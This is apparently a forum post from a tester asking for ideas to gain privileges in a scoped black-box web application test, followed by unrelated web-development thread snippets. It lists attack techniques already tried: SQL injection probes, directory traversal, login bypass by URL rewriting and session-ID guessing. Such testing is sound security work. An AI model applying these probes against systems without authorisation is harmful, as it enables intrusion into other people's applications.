Help popping a web application


Working on a Black Box application test and I am looking for a little
input on some things to try to get through this application. This is
against production deployed code but the test is against the test lab
systems so messing up the system is ok. The goal is elevated privilege
and/or data manipulation. What I am up against is a 3 tier web

Rules/scope are application only, no direct service attacks against
the OS/Network/ or server system (IIS 5) itself. So like no metasploit
type garbage. Hand jamming all the way and through the web interface


Web tier: Web Server is IIS 5.0, on win 2k
Application server Tier: application server is Websphere 6.0 on Win2k
DB tier is MS SQL on win 2k.

All separate boxes. Code base is Java. Authentication is handled by
Active Directory (out of scope). This is an internal app. There are
probably firewalls between me and the primary web server, but my area
is application only anyway. I have a user level login. Whole
connection scheme is SSL (cookies/presentation/ all of it).

Web inspect offered NO vulnerabilities.

What I have done both in the html portion of the application and
catching the info at a Burp Suite Proxy so I could by pass any funky

Standard 1=1 and ' type injections at multiple input locations.
Produced no errors just a custom "did not meet criteria message".

Directory transversal – no joy

URL rewrite for bypassing any login type criteria- no joy

Sequential session ID checks to hijack a 1 up system – no joy they are random

Large input (5000 characters) to see if I could force an error.

Bad option to a field sort request – got a custom error message
stating call the administrator. No information

No information in the html code. Column headings do not appear to
match DB tables when other requests are manipulated with html

Cookies and web pages are not cached.

There was other stuff but I am a little drained to remember right now.
I have until Sunday to pop this then my window closes.

Anything can help at this point. I hate to loose.


Relevant Pages

  • Re: How to do a post back when user press enter.
    ... It is hosted on a web server, ... the client browser, which is designed to read and interpret HTML. ... UI, via the event handler. ...
  • Re: Ribbon Tab focus
    ... I'm trying to think how of any of these scenarios I just mentioned in this post that could be easily done without a web browser control? ... If you understand the .net framework and technologies, you'll realize that Access Web services does not create sharepoint pages but in fact creates real .net "XAML" or so called "zammel" forms. ... Perhaps now are you going to suggest that visual studio and .net is to be dumped and all those wonderful technologies that they'd been building up for about 10 years, and now we are to simply produce simple HTML forms that nobody really can use anywhere with only incredibly limited functionality? ... So, there is no such technology that exist in the web world today that you can simply publish some web page up to a particular server without ADOPTING a particular coding language, a particular framework, a particular database server. ...
  • Re: PHP-Yes, HTML-No --- Why?
    ... The .html signifies that the file contains HTML - and pretty ... A php script contains both HTML and PHP code so technically speaking it's not just HTML. ... The user is getting a file from your web server, an HTML file, and it has an extension of something other than HTML. ... I hope you weren't configuring them as per your personal likes and dislikes but instead were configuring them as per the customer requirements and for speed, ...
  • Re: PHP-Yes, HTML-No --- Why?
    ... You are arguing to have ..html at the end of every URL even if the file contains PHP or another scripting language. ... By that very figure you are in the minority and I'd venture to guess the the number of people who really, really care about such trivial things such as yourself is probably closer to .1% in the real population. ... FTP requests are not HTTP. ... The point about MP3 files is that if you configure your web server to treat every file as potentially having dynamic content and that it should search through the entire file looking to determine exactly which language might be in use in the file and hand it off to the appropriate parser, interpreter or module then you are gonna have to contend with the fact that occasionally you're gonna be charging the web server with reading and parsing potentially huge files - all in the name of a foolish consistency. ...
  • Re: How to do a post back when user press enter.
    ... > requested by a client browser, ... > by an ISAPI (Internet Server Application Programming Interface) ... > and interpret HTML. ... > to its process and UI, via the event handler. ...